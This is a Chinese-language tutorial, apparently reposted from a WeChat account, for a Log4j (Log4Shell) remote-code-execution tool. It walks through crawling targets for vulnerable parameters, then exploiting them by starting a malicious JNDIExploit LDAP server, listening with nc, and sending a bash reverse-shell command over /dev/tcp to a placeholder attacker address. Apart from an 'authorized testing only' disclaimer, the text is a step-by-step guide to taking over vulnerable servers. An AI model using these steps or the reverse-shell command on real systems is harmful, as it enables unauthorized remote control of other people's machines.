Log4j_RCE_Tool V1.0 保姆级使用教程

渗透技巧 2年前 (2021) admin
714 0 0

前言


 本工具只可用于授权安全测试,请勿用于非法用途!

 工具经过了三个版本的迭代,现在已经发布了V1.0正式版,该版本由之前版本的默认内置常见参数方式改为更科学的爬虫爬取参数,自动进行参数识别(识别登陆表单、搜索表单、以及其他常见表单等),提高了测试的准确率与覆盖率。该版本还内置了六种bypass攻击载荷,进一步提高了漏洞检测率。
为了方便Mac OS用户,同时也发布了Mac版,支持M1处理器。


使用方法



一、漏洞验证

 本工具使用Rad爬虫进行参数爬取,首先Windows系统用户需要修改爬虫配置文件, rad_config.yml 文件,在exec_path处输入chrome路径,文件路径需要将路径转义如下图,Mac OS系统用户默认都是一样的无需修改。

Log4j_RCE_Tool V1.0 保姆级使用教程


Log4j_RCE_Tool V1.0 保姆级使用教程


 双击打开工具,再将自己的ceye平台的API tokenIdentifier填入对应的位置,工具采用多线程,可以输入多个目标进行检测,如果目标存在漏洞,漏洞的地址和参数将输出在检测结果框中。

Log4j_RCE_Tool V1.0 保姆级使用教程


Log4j_RCE_Tool V1.0 保姆级使用教程



二、漏洞利用

 该版本工具包含了漏洞利用模块,漏洞利用需要在公网的服务器启动一个恶意ldap服务,恶意ldap服务可以使用JNDIExploit开源项目(github自行搜索),用法为 java -jar JNDIExploit-1.2-SNAPSHOT.jar -i xx.xx.xx.xx ,启动恶意ldap服务后,还需在公网服务器使用NC监听一个端口,准备好后就可打开本工具,在URL中填入存在漏洞的地址,在命令框填入反弹shell命令,端口为之前NC监听端口(bash -i >& /dev/tcp/xx.xx.xx.xx/6666 0>&1),LDAP框填入恶意服务地址(xx.xx.xx.xx:1389),Payload填入漏洞验证时输出的参数,点击执行命令即可得到存在漏洞服务器的反弹shell。

Log4j_RCE_Tool V1.0 保姆级使用教程




视频演示



原文始发于微信公众号(InBug实验室):Log4j_RCE_Tool V1.0 保姆级使用教程

版权声明:admin 发表于 2021年12月15日 上午11:01。
转载请注明:Log4j_RCE_Tool V1.0 保姆级使用教程 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...